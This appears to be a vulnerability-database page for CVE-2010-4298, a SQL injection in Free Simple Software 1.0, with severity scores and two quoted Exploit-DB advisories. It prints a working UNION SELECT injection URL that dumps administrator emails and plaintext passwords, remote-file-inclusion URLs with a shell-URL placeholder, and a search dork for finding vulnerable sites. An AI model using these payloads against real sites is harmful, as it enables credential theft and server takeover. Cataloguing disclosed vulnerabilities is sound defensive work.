CVE-2010-4298
published 2010-11-26CVE-2010-4298: SQL injection vulnerability in the download module in Free Simple Software 1.0 allows remote attackers to execute arbitrary SQL commands via the downloads_id…
PriorityP344high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
0.99%
58.1th percentile
SQL injection vulnerability in the download module in Free Simple Software 1.0 allows remote attackers to execute arbitrary SQL commands via the downloads_id parameter in a download_now action to index.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| dustincowell | free_simple_software | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Free Simple Software - SQL Injection
exploitdb·2010-11-24·CVSS 7.5
CVE-2010-4298 [HIGH] Free Simple Software - SQL Injection
Free Simple Software - SQL Injection
---
'Free Simple Software' SQL Injection Vulnerability (CVE-2010-4298)
Mark Stanislav - [email protected]
I. DESCRIPTION
A vulnerability exists in the 'Free Simple Software' download module which allows for a 'UNION SELECT' to easily expose the application administrator's plaintext password.
II. TESTED VERSION
1.0 [Manual Install Version]
III. PoC EXPLOIT
http://site.com/index.php?page=downloads&request=download_now&downloads_id=' UNION SELECT email_address as name, NULL, NULL, password as file_name, last_name as file_url from admin_users where id!='NULL
IV. NOTES
* User passwords for this web application are not encrypted or hashed which makes this exploit even more concerning.
* The PoC assumes that the first user is the administrativ
Exploit-DB
Free Simple Software 1.0 - Remote File Inclusion
exploitdb·2010-08-17
CVE-2010-4298 Free Simple Software 1.0 - Remote File Inclusion
Free Simple Software 1.0 - Remote File Inclusion
---
########################################################
### Free Simple Software V1.0 ###
#By : Dr.$audi ( SauDi ViRuS TeaM )
#By : http://Sa-ViRuS.CoM
#Email : [email protected]
#Dork: Powered by free simple software
#Greets : RENO , Dr.php , ! BaD BoY ! , Gov.HaCkEr , Mind , AnTi SeCuRe
########################################################
Script HomePage: www.freesimplesoft.com #
########################################################
#RFI:
# http://site/path/themes/default/index.php?meta=[Shell URL]?
# http://site/path/themes/default/index.php?phpincdir=[Shell URL]?
########################################################
No writeups or analysis indexed.
http://www.securityfocus.com/archive/1/514863/100/0/threadedhttp://www.securityfocus.com/bid/44998https://www.uncompiled.com/2010/11/free-simple-software-sql-injection-vulnerability-cve-2010-4298/http://www.securityfocus.com/archive/1/514863/100/0/threadedhttp://www.securityfocus.com/bid/44998https://www.uncompiled.com/2010/11/free-simple-software-sql-injection-vulnerability-cve-2010-4298/
2010-11-26
Published